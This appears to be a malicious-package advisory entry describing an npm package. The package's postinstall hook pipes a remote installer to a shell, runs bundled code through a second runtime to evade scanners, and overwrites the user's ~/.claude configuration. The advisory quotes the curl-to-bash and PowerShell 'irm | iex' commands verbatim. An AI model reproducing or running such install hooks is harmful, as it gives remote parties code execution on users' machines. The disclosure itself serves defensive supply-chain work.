MAL-2026-4790

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e0137a523475bcb007059cff32df9ab8c2d8facb91e0d4d6326189e51c6b7b2b) scripts/postinstall.js runs automatically on `npm install` and, when `bun` is not already present, executes `curl -fsSL https://bun.sh/install | bash` on Unix or `powershell -Command "irm bun.sh/install.ps1 | iex"` on Windows. The fetched installer is unpinned (no version, no checksum, no signature verification), served from a third-party domain (`bun.sh`) that does not match the package's publisher, and piped directly to a shell interpreter. The package then uses the freshly-installed `bun` runtime to execute the bundled `dist/cc.mjs` — the alternate-runtime-dropper shape: a Node package pulling a second language runtime at install time and using it to run sibling code, evading scanners that only inspect Node-resolved code paths. Whoever controls bun.sh (or any TLS-MITM on the install path, or a future compromise of that domain) gains arbitrary code execution on every installer's machine. The behavior is undocumented in README. Postinstall additionally recursively force-copies the package's `claude/` directory over the user's `~/.claude/` configuration directory, clobbering any pre-existing Claude Code command/MCP customizations without prompt — secondary quality concern.